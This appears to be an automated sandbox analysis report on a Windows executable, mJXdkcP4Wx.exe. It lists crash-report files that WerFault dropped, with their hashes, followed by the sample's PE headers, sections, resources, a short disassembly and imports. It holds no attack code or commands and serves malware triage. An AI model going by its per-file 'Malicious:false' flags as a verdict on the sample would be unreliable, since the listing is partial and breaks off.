                                        SHA-512:CC839466213597A5A5F3FC0B14D47EAC40532DD41FA91EB76459B62CD18725D76B8462ECAF3E77BA0458D6C7231877249E72533A840BDC7C8B832589712BD50F
                                        Malicious:false
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.9.6.<./.P.i.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):4.4856303547496745
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zs2Jg77aI93wnWpW8VYiYm8M4JLFWHFzU+q8v4WWqhtN91tdd:uIjfMI79wW7VmJLFUUK4FqhtN91tdd
                                        MD5:1AF6EA4549697865D295BA6DBFEB3401
                                        SHA1:50E869ABBA6E8C1CC1E44617EAE096FD84A2C38E
                                        SHA-256:8F18E17CA1980EF43D434DA22FCB54539703CF35D0120158ACB6A019D99E7A07
                                        SHA-512:C75C5F5F09159EA3C4D539ECB4840947609F2DF7FAED910467B4018C92937C4ADBE890B416D7B86D79AAB85FB4ADAA690459ECAB8E38B2D37B97D1CECB2A3824
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534710" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 16:48:06 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):110048
                                        Entropy (8bit):1.7428622697180756
                                        Encrypted:false
                                        SSDEEP:384:PUSS2/vlAEysHuBLxzLnplNe1OUtcCF+iTYWVfcbKH1XAAcH4gcvbv0PvX:OSNAE9uBtXplg1GCFNT5fcbKH1Lc8sn
                                        MD5:B013410E67D18A33E553C120B808CA38
                                        SHA1:B5B486BC181F2723D3718BC130785068A1F79A19
                                        SHA-256:DC400E3A1ED7A4C1AEABF3EF64B0B050B5AD036698061244A17849C83F571212
                                        SHA-512:84DFA3A07AC67C2E2E92C3B532AA93BB85C5AE1089673771F824F02E5706DCCE7FAF5C2BEAE6E2308BA73D3406D46C57FEC078FEAE4DF6F4BC556CF3268DA1B2
                                        Malicious:false
                                        Preview:MDMP..a..... .......Fb.g....................................T....>..........T.......8...........T............*..(...........P...........<...............................................................................eJ..............GenuineIntel............T...........;b.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8442
                                        Entropy (8bit):3.7028306107079656
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJBd6+6YEIDSU9DagmfI9mpBw89bSzsfLGm:R6lXJL6+6YEcSU9DagmfGMSYfT
                                        MD5:97CF830E8046EC2B2DE093B9E267B604
                                        SHA1:D1400765E3AE9E48C52CAA0C8D5DD1EB548DB164
                                        SHA-256:7F75588B32B3039DE16332B0513E455C74722309B3CC8D747B28798DB9C6B7F8
                                        SHA-512:77FCFD0B44B7087378F0DEA34E22397F16D1052AD3267D4970554572482CC647CD1BB164BC6332FFB0576FD123F4D98561B844D77A228177C404A14B1AC091C4
                                        Malicious:false
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.9.6.<./.P.i.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):4.484615732408488
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zs2Jg77aI93wnWpW8VYmYm8M4JLFWHFtP+q8v4WWqhtN91tdd:uIjfMI79wW7VGJLFoK4FqhtN91tdd
                                        MD5:0E00D7A09A0287589B0A2AF46E10B080
                                        SHA1:E67A4602E79AAE7E498FC7679F1F3F5350D8BCE7
                                        SHA-256:2A774946712232AFB2744003FEBFBCC63CC726A80E5AFCC7B332E65E1A10C092
                                        SHA-512:29C3F462EDE4C0CFFE9EA2DAB79912D3597EC4B7D722EA9EAC3891ECC11929DA37D55D4A5C7F41B263B1299D62EA76CDC0C59C332329A8FCB74ED6C832799E45
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534710" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 16:48:09 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):60356
                                        Entropy (8bit):1.8058557749444835
                                        Encrypted:false
                                        SSDEEP:192:m2mrnFMNXrWOAOJw8k2MQUqTDcAEPV9hRM760Yxcb5vGeDTPO+3jk9tam/VzzQac:mN7FMRhAEFkWUqTDcAAvMLLb5K+gt3Ar
                                        MD5:1623D3B664236C9B74A01487AE068097
                                        SHA1:90DE21954C0F765B6BFDFB59DA297B4DB9AFACFA
                                        SHA-256:24C74C67D2D42A2477ED2CDF5C78BEABE71BCD164CA7672837D94F1309C8CA92
                                        SHA-512:7668FA3D0647FA90FF4961B2C7C4C9B829F2AFDC286C40EFC973F993CF6E4263F171F757E81407F1B102A1E6071C10A7248D28B16724DBE88581D145578BA5D3
                                        Malicious:false
                                        Preview:MDMP..a..... .......Ib.g............4...............<...........0*..........T.......8...........T............2.............X...........D...............................................................................eJ..............GenuineIntel............T...........;b.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8336
                                        Entropy (8bit):3.700590469472151
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJB06s6YEILSU9v+GgmfHhcYOGpDv89bFzsfasXm:R6lXJi6s6YE0SU9vPgmf2BFYfC
                                        MD5:992DB74280BCEA71F8A0242BB0DBDCEF
                                        SHA1:7F24D07DBEC04143FE162401CB588916394441D9
                                        SHA-256:DAB0F168A059CDE7CE202ECCCEDAF3758B5E1578B2A7E17C74F11949DF949815
                                        SHA-512:E0B82E1D7A4514BB7EB3226441DBF9E0CE98B497773868F897F0D31397805FCC1F0315EB3BC6FA66457D9D65A1E0E098A62605B4F14EDFF0336CB5230637E1EE
                                        Malicious:false
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.9.6.<./.P.i.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4579
                                        Entropy (8bit):4.469150334006464
                                        Encrypted:false
                                        SSDEEP:96:uIjfMI79wW7VUJLFpGu3b5gaqhtN91tdd:uI4Y9wW7CVqvHT
                                        MD5:611ED0D9D7E984C245F838709D851867
                                        SHA1:3D937AD72D954E94A9D0CB88696C89BB862665DE
                                        SHA-256:3757C7A84C7A29815A65FEBBEA00D81EF573E4C8F45B4144A28A4313F7EFB85A
                                        SHA-512:2AA2E11A20CEAF8846DA27D84DDA1EEA236E1374E60481EADE1CE2B129B7561495C87E04A9654FE1AFEBAE355528533F94BDABF697EF0328572260CE2EAB33EE
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534710" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.421573994299397
                                        Encrypted:false
                                        SSDEEP:6144:lSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNv0uhiTw:svloTMW+EZMM6DFyd03w
                                        MD5:864EE3A0AD4BD67DAB5A5FFAA6DD9FAF
                                        SHA1:F1E86E60E009E8A9DD83CFC00E52197890555541
                                        SHA-256:46E97C1D259651FE6F8D0DE6E7A4C47352FA46EB4F03E929B13B2F9E90BA29E2
                                        SHA-512:01219878A57EF885D69580BF7F0AA1B8B5C56B0E0F58A53D6A3B585B4EB60A607DDC8F68E82746252320FFC80ED353683A35E969E4CA00256C2B02ABA7FEAB06
                                        Malicious:false
                                        Preview:regfD...D....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv.B................................................................................................................................................................................................................................................................................................................................................qcU.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.919289593273248
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:mJXdkcP4Wx.exe
                                        File size:342'528 bytes
                                        MD5:be89dddee1630cde41b95d2df6070bd3
                                        SHA1:bceb2f765aad912ea1e1e3d324f215baece7fcb5
                                        SHA256:e3cd6c9514e46e4bd1e42240e6ec7a82322fe4792a270312ff1ae096b3c4e16f
                                        SHA512:d4bf75d3c7b175634719a6b1ad2bfa04615161e147fa6bccfb599f9c3f2068ff649895507d66ad763f3a62aab61a420276d089b5aa59cb6d8f1ebb52f2113317
                                        SSDEEP:6144:ZYLlLOl9gwCowOlf0VuW+GZCBK4LLvcogole:KBLOlCwBwOlKCvco2
                                        TLSH:0174381361F57C12F2B2073A4F2D9AEC3B2EF9665E24D3090118AECE5971AB1C51F71A
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@.....................................h......................................Rich............PE..L......e...................
                                        Icon Hash:73a733b183838be4
                                        Entrypoint:0x401667
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x65A09FAD [Fri Jan 12 02:10:53 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:0
                                        File Version Major:5
                                        File Version Minor:0
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:0
                                        Import Hash:73f75479e2c39cbb9472d61ec92fd436
                                        Instruction
                                        call 00007F33111AA0E4h
                                        jmp 00007F33111A74EEh
                                        mov edi, edi
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 00000328h
                                        mov dword ptr [004353C8h], eax
                                        mov dword ptr [004353C4h], ecx
                                        mov dword ptr [004353C0h], edx
                                        mov dword ptr [004353BCh], ebx
                                        mov dword ptr [004353B8h], esi
                                        mov dword ptr [004353B4h], edi
                                        mov word ptr [004353E0h], ss
                                        mov word ptr [004353D4h], cs
                                        mov word ptr [004353B0h], ds
                                        mov word ptr [004353ACh], es
                                        mov word ptr [004353A8h], fs
                                        mov word ptr [004353A4h], gs
                                        pushfd
                                        pop dword ptr [004353D8h]
                                        mov eax, dword ptr [ebp+00h]
                                        mov dword ptr [004353CCh], eax
                                        mov eax, dword ptr [ebp+04h]
                                        mov dword ptr [004353D0h], eax
                                        lea eax, dword ptr [ebp+08h]
                                        mov dword ptr [004353DCh], eax
                                        mov eax, dword ptr [ebp-00000320h]
                                        mov dword ptr [00435318h], 00010001h
                                        mov eax, dword ptr [004353D0h]
                                        mov dword ptr [004352CCh], eax
                                        mov dword ptr [004352C0h], C0000409h
                                        mov dword ptr [004352C4h], 00000001h
                                        mov eax, dword ptr [00434008h]
                                        mov dword ptr [ebp-00000328h], eax
                                        mov eax, dword ptr [0043400Ch]
                                        mov dword ptr [ebp-00000324h], eax
                                        call dword ptr [000000CCh]
                                        Programming Language:
                                        • [C++] VS2008 build 21022
                                        • [ASM] VS2008 build 21022
                                        • [ C ] VS2008 build 21022
                                        • [IMP] VS2005 build 50727
                                        • [RES] VS2008 build 21022
                                        • [LNK] VS2008 build 21022
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x336e40x3c.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1120000x1e840.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x334100x18.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x320000x184.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x3099f0x30a00d641737f49dccffcfd23372260332ebfFalse0.9262481924807198data7.877215506573334IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x320000x1fc00x2000fc405b89763810a8b173ae15f3f548f1False0.369384765625data5.601515124366471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x340000xda67c0x14003a1191708adf0fe4d491938b7f38f3abFalse0.1681640625data1.8222227042599355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .notiza0x10f0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .tls0x1100000x51d0x60053e979547d8c2ea86560ac45de08ae25False0.013020833333333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .vumob0x1110000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x1120000x14e8400x1ea00626a7e210c9d61e92ba0aef95432462dFalse0.35115593112244897data4.665453737852969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_CURSOR0x12ba580x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                        RT_ICON0x112a300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5711620469083155
                                        RT_ICON0x1138d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.641245487364621
                                        RT_ICON0x1141800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6941244239631337
                                        RT_ICON0x1148480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7514450867052023
                                        RT_ICON0x114db00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5196058091286307
                                        RT_ICON0x1173580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.62406191369606
                                        RT_ICON0x1184000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6311475409836066
                                        RT_ICON0x118d880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7659574468085106
                                        RT_ICON0x1192680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.337953091684435
                                        RT_ICON0x11a1100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5284296028880866
                                        RT_ICON0x11a9b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6019585253456221
                                        RT_ICON0x11b0800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6488439306358381
                                        RT_ICON0x11b5e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.4276970954356846
                                        RT_ICON0x11db900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.509016393442623
                                        RT_ICON0x11e5180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.5097517730496454
                                        RT_ICON0x11e9e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3315565031982942
                                        RT_ICON0x11f8900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.39981949458483756
                                        RT_ICON0x1201380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.402073732718894
                                        RT_ICON0x1208000x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.398121387283237
                                        RT_ICON0x120d680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.13713692946058093
                                        RT_ICON0x1233100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.15924015009380862
                                        RT_ICON0x1243b80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.1942622950819672
                                        RT_ICON0x124d400x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.225177304964539
                                        RT_ICON0x1252200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.3315565031982942
                                        RT_ICON0x1260c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.39981949458483756
                                        RT_ICON0x1269700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.402073732718894
                                        RT_ICON0x1270380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.398121387283237
                                        RT_ICON0x1275a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.13713692946058093
                                        RT_ICON0x129b480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.15924015009380862
                                        RT_ICON0x12abf00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.1942622950819672
                                        RT_ICON0x12b5780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.225177304964539
                                        RT_STRING0x12bd600x476data0.44921190893169877
                                        RT_STRING0x12c1d80x504data0.45794392523364486
                                        RT_STRING0x12c6e00x6b4data0.4324009324009324
                                        RT_STRING0x12cd980x760data0.4253177966101695
                                        RT_STRING0x12d4f80x706data0.42880978865406005
                                        RT_STRING0x12dc000x8b8data0.4211469534050179
                                        RT_STRING0x12e4b80x6d2data0.4306987399770905
                                        RT_STRING0x12eb900x4a4data0.46380471380471383
                                        RT_STRING0x12f0380x62edata0.4361567635903919
                                        RT_STRING0x12f6680x520data0.45198170731707316
                                        RT_STRING0x12fb880x722data0.4244249726177437
                                        RT_STRING0x1302b00x560data0.438953488372093
                                        RT_STRING0x1308100x2edata0.6304347826086957
                                        RT_GROUP_CURSOR0x12bb880x14data1.15
                                        RT_GROUP_ICON0x11e9800x68dataTurkishTurkey0.7019230769230769
                                        RT_GROUP_ICON0x1251a80x76dataTurkishTurkey0.6694915254237288
                                        RT_GROUP_ICON0x12b9e00x76dataTurkishTurkey0.6694915254237288
                                        RT_GROUP_ICON0x1191f00x76dataTurkishTurkey0.6610169491525424
                                        RT_VERSION0x12bba00x1bcdata0.581081081081081
                                        DLLImport
                                        KERNEL32.dllSearchPathW, WriteConsoleOutputCharacterA, GetCommState, ReadConsoleA, InterlockedDecrement, QueryDosDeviceA, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, ConnectNamedPipe, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, FormatMessageA, SetCommState, LoadLibraryW, GetConsoleMode, CopyFileW, ReadConsoleOutputW, GetConsoleAliasExesLengthW, GetSystemTimeAdjustment, DeleteVolumeMountPointW, HeapDestroy, GetFileAttributesW, GetBinaryTypeW, ReleaseSemaphore, GetLastError, GetLongPathNameW, GetProcAddress, SetStdHandle, BuildCommDCBW, GetNumaHighestNodeNumber, ResetEvent, LoadLibraryA, LocalAlloc, SetCalendarInfoW, FindAtomA, GetModuleFileNameA, GetDefaultCommConfigA, FatalAppExitA, GetShortPathNameW, GlobalReAlloc, GetVolumeInformationW, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, 